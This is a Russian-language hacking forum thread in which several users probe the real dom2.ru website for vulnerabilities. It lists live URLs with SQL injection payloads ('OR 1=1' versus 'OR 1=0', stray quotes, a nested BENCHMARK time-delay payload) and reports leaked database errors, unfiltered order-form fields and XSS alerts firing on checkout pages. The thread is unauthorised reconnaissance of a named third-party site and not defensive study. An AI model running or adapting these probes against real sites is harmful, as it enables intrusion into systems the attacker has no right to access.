1)_http://connect.dom2.ru/view/user/index.do?id=3763'32
репорт об ошибке

2)_http://www.dom2.ru/shop/index.phtml?prod=55)
Добился чего-то) Вроде как полноценная SQL

3)_http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1
_http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=0
разные значения выводятся...

Продолжаю поиски....

Так держать! Это уже надоедает ("начался 145739 день нашей стройки...")

первая репорт явы. Нах он нужен.
Второе и третье скули, но ты ничего ельзя сделать из-за фильтров

4)_http://www.dom2.ru/journal/index.phtml?day=622)
а вот такая вот как?)

4-я поинтересней, но ИМХО с её помощью тоже ничего к сожалению не поделаешь... Админы дома 2 тоже не такие уж и дураки...

+-------------------------------------------------------+
| _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 |
| _http://www.dom2.ru/shop/index.phtml?prod=55 OR 1=1 |
+-------------------------------------------------------+

Не пойму, в чём тут разница...

Упс.... исправил....

_http://www.dom2.ru/shop/puttocart.phtml

По адресу __http://www.dom2.ru/shop/order.phtml не фильтруются вводимые поля, пропускает все теги и по адресу __http://www.dom2.ru/shop/confirmpay.phtml алерт вылетает свободно... Как обстоит дело на той стороне, когда заказ послан, хз...

2 SanyaX
Толку 0 ....

http://www2.dom2.ru/shop/?cat=.index.phtml короче если такую шляпу ввести,то
Query Error!
Unknown table 'index' in where clause

Тут давно читал как Дом-2 ломали,так ием кто ломал пришлось сперва свалить Севант ТНТ потом ещё какой-то,я не помню(ГОЛОД чтоль?!) а потом они уже до дома дошли....

http://www.dom2.ru/journal/index.phtml?day=BENCHMARK(10000000,BENCHMARK(10000 000,md5(current_date)))

Выходит "error", но думаю, что это ничего не даст =(